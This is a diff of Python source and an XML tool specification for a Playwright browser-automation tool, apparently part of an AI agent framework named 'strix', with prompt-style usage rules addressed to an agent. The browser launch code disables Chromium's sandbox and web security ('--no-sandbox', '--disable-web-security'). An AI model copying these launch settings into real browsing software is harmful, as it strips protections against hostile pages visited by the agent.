tab_id: str | None = None,
clear: bool = False,
) -> dict[str, Any]:
if action == "wait":
_validate_duration(action, duration)
assert duration is not None
return manager.wait_browser(duration, tab_id)
if action == "execute_js":
_validate_js_code(action, js_code)
assert js_code is not None
return manager.execute_js(js_code, tab_id)
if action == "save_pdf":
_validate_file_path(action, file_path)
assert file_path is not None
return manager.save_pdf(file_path, tab_id)
if action == "get_console_logs":
return manager.get_console_logs(tab_id, clear)
if action == "view_source":
return manager.view_source(tab_id)
if action == "close":
return manager.close_browser()
raise ValueError(f"Unknown utility action: {action}")
@register_tool
def browser_action(
action: BrowserAction,
url: str | None = None,
coordinate: str | None = None,
text: str | None = None,
tab_id: str | None = None,
js_code: str | None = None,
duration: float | None = None,
key: str | None = None,
file_path: str | None = None,
clear: bool = False,
) -> dict[str, Any]:
manager = get_browser_tab_manager()
try:
navigation_actions = {"launch", "goto", "back", "forward"}
interaction_actions = {
"click",
"type",
"double_click",
"hover",
"press_key",
"scroll_down",
"scroll_up",
}
tab_actions = {"new_tab", "switch_tab", "close_tab", "list_tabs"}
utility_actions = {
"wait",
"execute_js",
"save_pdf",
"get_console_logs",
"view_source",
"close",
}
if action in navigation_actions:
return _handle_navigation_actions(manager, action, url, tab_id)
if action in interaction_actions:
return _handle_interaction_actions(manager, action, coordinate, text, key, tab_id)
if action in tab_actions:
return _handle_tab_actions(manager, action, url, tab_id)
if action in utility_actions:
return _handle_utility_actions(
manager, action, duration, js_code, file_path, tab_id, clear
)
_raise_unknown_action(action)
except (ValueError, RuntimeError) as e:
return {
"error": str(e),
"tab_id": tab_id,
"screenshot": "",
"is_running": False,
}

View File

@@ -0,0 +1,183 @@
<?xml version="1.0" ?>
<tools>
<tool name="browser_action">
<description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
The browser is PERSISTENT and remains active until explicitly closed, allowing for
multi-step workflows and long-running processes across multiple tabs.</description>
<parameters>
<parameter name="action" type="string" required="true">
</parameter>
<parameter name="url" type="string" required="false">
<description>Required for 'launch', 'goto', and optionally for 'new_tab' actions. The URL to launch the browser at, navigate to, or load in new tab. Must include appropriate protocol (e.g., http://, https://, file://).</description>
</parameter>
<parameter name="coordinate" type="string" required="false">
<description>Required for 'click', 'double_click', and 'hover' actions. Format: "x,y" (e.g., "432,321"). Coordinates should target the center of elements (buttons, links, etc.). Must be within the browser viewport resolution. Be very careful to calculate the coordinates correctly based on the previous screenshot.</description>
</parameter>
<parameter name="text" type="string" required="false">
<description>Required for 'type' action. The text to type in the field.</description>
</parameter>
<parameter name="tab_id" type="string" required="false">
<description>Required for 'switch_tab' and 'close_tab' actions. Optional for other actions to specify which tab to operate on. The ID of the tab to operate on. The first tab created during 'launch' has ID "tab_1". If not provided, actions will operate on the currently active tab.</description>
</parameter>
<parameter name="js_code" type="string" required="false">
<description>Required for 'execute_js' action. JavaScript code to execute in the page context. The code runs in the context of the current page and has access to the DOM and all page-defined variables and functions. The last evaluated expression's value is returned in the response.</description>
</parameter>
<parameter name="duration" type="string" required="false">
<description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
</parameter>
<parameter name="key" type="string" required="false">
<description>Required for 'press_key' action. The key to press. Valid values include: - Single characters: 'a'-'z', 'A'-'Z', '0'-'9' - Special keys: 'Enter', 'Escape', 'ArrowLeft', 'ArrowRight', etc. - Modifier keys: 'Shift', 'Control', 'Alt', 'Meta' - Function keys: 'F1'-'F12'</description>
</parameter>
<parameter name="file_path" type="string" required="false">
<description>Required for 'save_pdf' action. The file path where to save the PDF.</description>
</parameter>
<parameter name="clear" type="boolean" required="false">
<description>For 'get_console_logs' action: whether to clear console logs after retrieving them. Default is False (keep logs).</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - screenshot: Base64 encoded PNG of the current page state - url: Current page URL - title: Current page title - viewport: Current browser viewport dimensions - tab_id: ID of the current active tab - all_tabs: Dict of all open tab IDs and their URLs - message: Status message about the action performed - js_result: Result of JavaScript execution (for execute_js action) - pdf_saved: File path of saved PDF (for save_pdf action) - console_logs: Array of console messages (for get_console_logs action) Limited to 50KB total and 200 most recent logs. Individual messages truncated at 1KB. - page_source: HTML source code (for view_source action) Large pages are truncated to 100KB (keeping beginning and end sections).</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: The browser remains active and maintains its state until
explicitly closed with the 'close' action. This allows for multi-step workflows
across multiple tool calls and tabs.
2. Browser interaction MUST start with 'launch' and end with 'close'.
3. Only one action can be performed per call.
4. To visit a new URL not reachable from current page, either:
- Use 'goto' action
- Open a new tab with the URL
- Close browser and relaunch
5. Click coordinates must be derived from the most recent screenshot.
6. You MUST click on the center of the element, not the edge. You MUST calculate
the coordinates correctly based on the previous screenshot, otherwise the click
will fail. After clicking, check the new screenshot to verify the click was
successful.
7. Tab management:
- First tab from 'launch' is "tab_1"
- New tabs are numbered sequentially ("tab_2", "tab_3", etc.)
- Must have at least one tab open at all times
- Actions affect the currently active tab unless tab_id is specified
8. JavaScript execution (following Playwright evaluation patterns):
- Code runs in the browser page context, not the tool context
- Has access to DOM (document, window, etc.) and page variables/functions
- The LAST EVALUATED EXPRESSION is automatically returned - no return statement needed
- For simple values: document.title (returns the title)
- For objects: {title: document.title, url: location.href} (returns the object)
- For async operations: Use await and the promise result will be returned
- AVOID explicit return statements - they can break evaluation
- object literals must be wrapped in paranthesis when they are the final expression
- Variables from tool context are NOT available - pass data as parameters if needed
- Examples of correct patterns:
* Single value: document.querySelectorAll('img').length
* Object result: {images: document.images.length, links: document.links.length}
* Async operation: await fetch(location.href).then(r => r.status)
* DOM manipulation: document.body.style.backgroundColor = 'red'; 'background changed'
9. Wait action:
- Time is specified in seconds
- Can be used to wait for page loads, animations, etc.
- Can be fractional (e.g., 0.5 seconds)
- Screenshot is captured after the wait
10. The browser can operate concurrently with other tools. You may invoke
terminal, python, or other tools (in separate assistant messages) while maintaining
the active browser session, enabling sophisticated multi-tool workflows.
11. Keyboard actions:
- Use press_key for individual key presses
- Use type for typing regular text
- Some keys have special names based on Playwright's key documentation
12. All code in the js_code parameter is executed as-is - there's no need to
escape special characters or worry about formatting. Just write your JavaScript
code normally. It can be single line or multi-line.
13. For form filling, click on the field first, then use 'type' to enter text.
14. The browser runs in headless mode using Chrome engine for security and performance.
</notes>
<examples>
# Launch browser at URL (creates tab_1)
<function=browser_action>
<parameter=action>launch</parameter>
<parameter=url>https://example.com</parameter>
</function>
# Navigate to different URL
<function=browser_action>
<parameter=action>goto</parameter>
<parameter=url>https://github.com</parameter>
</function>
# Open new tab with different URL
<function=browser_action>
<parameter=action>new_tab</parameter>
<parameter=url>https://another-site.com</parameter>
</function>
# Wait for page load
<function=browser_action>
<parameter=action>wait</parameter>
<parameter=duration>2.5</parameter>
</function>
# Click login button at coordinates from screenshot
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>450,300</parameter>
</function>
# Click username field and type
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>400,200</parameter>
</function>
<function=browser_action>
<parameter=action>type</parameter>
<parameter=text>user@example.com</parameter>
</function>
# Click password field and type
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>400,250</parameter>
</function>
<function=browser_action>
<parameter=action>type</parameter>
<parameter=text>mypassword123</parameter>
</function>
# Press Enter key
<function=browser_action>
<parameter=action>press_key</parameter>
<parameter=key>Enter</parameter>
</function>
# Execute JavaScript to get page stats (correct pattern - no return statement)
<function=browser_action>
<parameter=action>execute_js</parameter>
<parameter=js_code>const images = document.querySelectorAll('img');
const links = document.querySelectorAll('a');
{
images: images.length,
links: links.length,
title: document.title
}</parameter>
</function>
# Scroll down
<function=browser_action>
<parameter=action>scroll_down</parameter>
</function>
# Get console logs
<function=browser_action>
<parameter=action>get_console_logs</parameter>
</function>
# View page source
<function=browser_action>
<parameter=action>view_source</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,533 @@
import asyncio
import base64
import logging
import threading
from pathlib import Path
from typing import Any, cast
from playwright.async_api import Browser, BrowserContext, Page, Playwright, async_playwright
logger = logging.getLogger(__name__)
MAX_PAGE_SOURCE_LENGTH = 20_000
MAX_CONSOLE_LOG_LENGTH = 30_000
MAX_INDIVIDUAL_LOG_LENGTH = 1_000
MAX_CONSOLE_LOGS_COUNT = 200
MAX_JS_RESULT_LENGTH = 5_000
class BrowserInstance:
def __init__(self) -> None:
self.is_running = True
self._execution_lock = threading.Lock()
self.playwright: Playwright | None = None
self.browser: Browser | None = None
self.context: BrowserContext | None = None
self.pages: dict[str, Page] = {}
self.current_page_id: str | None = None
self._next_tab_id = 1
self.console_logs: dict[str, list[dict[str, Any]]] = {}
self._loop: asyncio.AbstractEventLoop | None = None
self._loop_thread: threading.Thread | None = None
self._start_event_loop()
def _start_event_loop(self) -> None:
def run_loop() -> None:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self._loop_thread = threading.Thread(target=run_loop, daemon=True)
self._loop_thread.start()
while self._loop is None:
threading.Event().wait(0.01)
def _run_async(self, coro: Any) -> dict[str, Any]:
if not self._loop or not self.is_running:
raise RuntimeError("Browser instance is not running")
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return cast("dict[str, Any]", future.result(timeout=30)) # 30 second timeout
async def _setup_console_logging(self, page: Page, tab_id: str) -> None:
self.console_logs[tab_id] = []
def handle_console(msg: Any) -> None:
text = msg.text
if len(text) > MAX_INDIVIDUAL_LOG_LENGTH:
text = text[:MAX_INDIVIDUAL_LOG_LENGTH] + "... [TRUNCATED]"
log_entry = {
"type": msg.type,
"text": text,
"location": msg.location,
"timestamp": asyncio.get_event_loop().time(),
}
self.console_logs[tab_id].append(log_entry)
if len(self.console_logs[tab_id]) > MAX_CONSOLE_LOGS_COUNT:
self.console_logs[tab_id] = self.console_logs[tab_id][-MAX_CONSOLE_LOGS_COUNT:]
page.on("console", handle_console)
async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
self.playwright = await async_playwright().start()
self.browser = await self.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
"--disable-features=VizDisplayCompositor",
],
)
self.context = await self.browser.new_context(
viewport={"width": 1280, "height": 720},
user_agent=(
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
),
)
page = await self.context.new_page()
tab_id = f"tab_{self._next_tab_id}"
self._next_tab_id += 1
self.pages[tab_id] = page
self.current_page_id = tab_id
await self._setup_console_logging(page, tab_id)
if url:
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
async def _get_page_state(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await asyncio.sleep(2)
screenshot_bytes = await page.screenshot(type="png", full_page=False)
screenshot_b64 = base64.b64encode(screenshot_bytes).decode("utf-8")
url = page.url
title = await page.title()
viewport = page.viewport_size
all_tabs = {}
for tid, tab_page in self.pages.items():
all_tabs[tid] = {
"url": tab_page.url,
"title": await tab_page.title() if not tab_page.is_closed() else "Closed",
}
return {
"screenshot": screenshot_b64,
"url": url,
"title": title,
"viewport": viewport,
"tab_id": tab_id,
"all_tabs": all_tabs,
}
def launch(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
if self.browser is not None:
raise ValueError("Browser is already launched")
return self._run_async(self._launch_browser(url))
def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._goto(url, tab_id))
async def _goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._click(coordinate, tab_id))
async def _click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.click(x, y)
return await self._get_page_state(tab_id)
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._type_text(text, tab_id))
async def _type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.keyboard.type(text)
return await self._get_page_state(tab_id)
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._scroll(direction, tab_id))
async def _scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
if direction == "down":
await page.keyboard.press("PageDown")
elif direction == "up":
await page.keyboard.press("PageUp")
else:
raise ValueError(f"Invalid scroll direction: {direction}")
return await self._get_page_state(tab_id)
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._back(tab_id))
async def _back(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.go_back(wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._forward(tab_id))
async def _forward(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.go_forward(wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._new_tab(url))
async def _new_tab(self, url: str | None = None) -> dict[str, Any]:
if not self.context:
raise ValueError("Browser not launched")
page = await self.context.new_page()
tab_id = f"tab_{self._next_tab_id}"
self._next_tab_id += 1
self.pages[tab_id] = page
self.current_page_id = tab_id
await self._setup_console_logging(page, tab_id)
if url:
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._switch_tab(tab_id))
async def _switch_tab(self, tab_id: str) -> dict[str, Any]:
if tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
self.current_page_id = tab_id
return await self._get_page_state(tab_id)
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._close_tab(tab_id))
async def _close_tab(self, tab_id: str) -> dict[str, Any]:
if tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
if len(self.pages) == 1:
raise ValueError("Cannot close the last tab")
page = self.pages.pop(tab_id)
await page.close()
if tab_id in self.console_logs:
del self.console_logs[tab_id]
if self.current_page_id == tab_id:
self.current_page_id = next(iter(self.pages.keys()))
return await self._get_page_state(self.current_page_id)
def wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._wait(duration, tab_id))
async def _wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
await asyncio.sleep(duration)
return await self._get_page_state(tab_id)
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._execute_js(js_code, tab_id))
async def _execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
try:
result = await page.evaluate(js_code)
except Exception as e: # noqa: BLE001
result = {
"error": True,
"error_type": type(e).__name__,
"error_message": str(e),
}
result_str = str(result)
if len(result_str) > MAX_JS_RESULT_LENGTH:
result = result_str[:MAX_JS_RESULT_LENGTH] + "... [JS result truncated at 5k chars]"
state = await self._get_page_state(tab_id)
state["js_result"] = result
return state
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._get_console_logs(tab_id, clear))
async def _get_console_logs(
self, tab_id: str | None = None, clear: bool = False
) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
logs = self.console_logs.get(tab_id, [])
total_length = sum(len(str(log)) for log in logs)
if total_length > MAX_CONSOLE_LOG_LENGTH:
truncated_logs: list[dict[str, Any]] = []
current_length = 0
for log in reversed(logs):
log_length = len(str(log))
if current_length + log_length <= MAX_CONSOLE_LOG_LENGTH:
truncated_logs.insert(0, log)
current_length += log_length
else:
break
if len(truncated_logs) < len(logs):
truncation_notice = {
"type": "info",
"text": (
f"[TRUNCATED: {len(logs) - len(truncated_logs)} older logs "
f"removed to stay within {MAX_CONSOLE_LOG_LENGTH} character limit]"
),
"location": {},
"timestamp": 0,
}
truncated_logs.insert(0, truncation_notice)
logs = truncated_logs
if clear:
self.console_logs[tab_id] = []
state = await self._get_page_state(tab_id)
state["console_logs"] = logs
return state
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._view_source(tab_id))
async def _view_source(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
source = await page.content()
original_length = len(source)
if original_length > MAX_PAGE_SOURCE_LENGTH:
truncation_message = (
f"\n\n<!-- [TRUNCATED: {original_length - MAX_PAGE_SOURCE_LENGTH} "
"characters removed] -->\n\n"
)
available_space = MAX_PAGE_SOURCE_LENGTH - len(truncation_message)
truncate_point = available_space // 2
source = source[:truncate_point] + truncation_message + source[-truncate_point:]
state = await self._get_page_state(tab_id)
state["page_source"] = source
return state
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._double_click(coordinate, tab_id))
async def _double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.dblclick(x, y)
return await self._get_page_state(tab_id)
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._hover(coordinate, tab_id))
async def _hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.move(x, y)
return await self._get_page_state(tab_id)
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._press_key(key, tab_id))
async def _press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.keyboard.press(key)
return await self._get_page_state(tab_id)
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._save_pdf(file_path, tab_id))
async def _save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
if not Path(file_path).is_absolute():
file_path = str(Path("/workspace") / file_path)
page = self.pages[tab_id]
await page.pdf(path=file_path)
state = await self._get_page_state(tab_id)
state["pdf_saved"] = file_path
return state
def close(self) -> None:
with self._execution_lock:
self.is_running = False
if self._loop:
asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
self._loop.call_soon_threadsafe(self._loop.stop)
if self._loop_thread:
self._loop_thread.join(timeout=5)
async def _close_browser(self) -> None:
try:
if self.browser:
await self.browser.close()
if self.playwright:
await self.playwright.stop()
except (OSError, RuntimeError) as e:
logger.warning(f"Error closing browser: {e}")
def is_alive(self) -> bool:
return self.is_running and self.browser is not None and self.browser.is_connected()

View File

@@ -0,0 +1,342 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from .browser_instance import BrowserInstance
class BrowserTabManager:
def __init__(self) -> None:
self.browser_instance: BrowserInstance | None = None
self._lock = threading.Lock()
self._register_cleanup_handlers()
def launch_browser(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is not None:
raise ValueError("Browser is already launched")
try:
self.browser_instance = BrowserInstance()
result = self.browser_instance.launch(url)
result["message"] = "Browser launched successfully"
except (OSError, ValueError, RuntimeError) as e:
if self.browser_instance:
self.browser_instance = None
raise RuntimeError(f"Failed to launch browser: {e}") from e
else:
return result
def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.goto(url, tab_id)
result["message"] = f"Navigated to {url}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to navigate to URL: {e}") from e
else:
return result
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.click(coordinate, tab_id)
result["message"] = f"Clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to click: {e}") from e
else:
return result
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.type_text(text, tab_id)
result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to type text: {e}") from e
else:
return result
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.scroll(direction, tab_id)
result["message"] = f"Scrolled {direction}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to scroll: {e}") from e
else:
return result
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.back(tab_id)
result["message"] = "Navigated back"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go back: {e}") from e
else:
return result
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.forward(tab_id)
result["message"] = "Navigated forward"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go forward: {e}") from e
else:
return result
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.new_tab(url)
result["message"] = f"Created new tab {result.get('tab_id', '')}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to create new tab: {e}") from e
else:
return result
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.switch_tab(tab_id)
result["message"] = f"Switched to tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to switch tab: {e}") from e
else:
return result
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.close_tab(tab_id)
result["message"] = f"Closed tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close tab: {e}") from e
else:
return result
def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.wait(duration, tab_id)
result["message"] = f"Waited {duration}s"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to wait: {e}") from e
else:
return result
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.execute_js(js_code, tab_id)
result["message"] = "JavaScript executed successfully"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
else:
return result
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.double_click(coordinate, tab_id)
result["message"] = f"Double clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to double click: {e}") from e
else:
return result
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.hover(coordinate, tab_id)
result["message"] = f"Hovered at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to hover: {e}") from e
else:
return result
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.press_key(key, tab_id)
result["message"] = f"Pressed key {key}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to press key: {e}") from e
else:
return result
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.save_pdf(file_path, tab_id)
result["message"] = f"Page saved as PDF: {file_path}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to save PDF: {e}") from e
else:
return result
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.get_console_logs(tab_id, clear)
action_text = "cleared and retrieved" if clear else "retrieved"
logs = result.get("console_logs", [])
truncated = any(log.get("text", "").startswith("[TRUNCATED:") for log in logs)
truncated_text = " (truncated)" if truncated else ""
result["message"] = (
f"Console logs {action_text} for tab "
f"{result.get('tab_id', 'current')}{truncated_text}"
)
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get console logs: {e}") from e
else:
return result
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.view_source(tab_id)
result["message"] = "Page source retrieved"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get page source: {e}") from e
else:
return result
def list_tabs(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
try:
tab_info = {}
for tid, tab_page in self.browser_instance.pages.items():
try:
tab_info[tid] = {
"url": tab_page.url,
"title": "Unknown" if tab_page.is_closed() else "Active",
"is_current": tid == self.browser_instance.current_page_id,
}
except (AttributeError, RuntimeError):
tab_info[tid] = {
"url": "Unknown",
"title": "Closed",
"is_current": False,
}
return {
"tabs": tab_info,
"total_count": len(tab_info),
"current_tab": self.browser_instance.current_page_id,
}
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to list tabs: {e}") from e
def close_browser(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
self.browser_instance.close()
self.browser_instance = None
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close browser: {e}") from e
else:
return {
"message": "Browser closed successfully",
"screenshot": "",
"is_running": False,
}
def cleanup_dead_browser(self) -> None:
with self._lock:
if self.browser_instance and not self.browser_instance.is_alive():
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
def close_all(self) -> None:
with self._lock:
if self.browser_instance:
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all()
sys.exit(0)
_browser_tab_manager = BrowserTabManager()
def get_browser_tab_manager() -> BrowserTabManager:
return _browser_tab_manager

302
strix/tools/executor.py Normal file
View File

@@ -0,0 +1,302 @@
import inspect
import os
from typing import Any
import httpx
if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
from strix.runtime import get_runtime
from .argument_parser import convert_arguments
from .registry import (
get_tool_by_name,
get_tool_names,
needs_agent_state,
should_execute_in_sandbox,
)
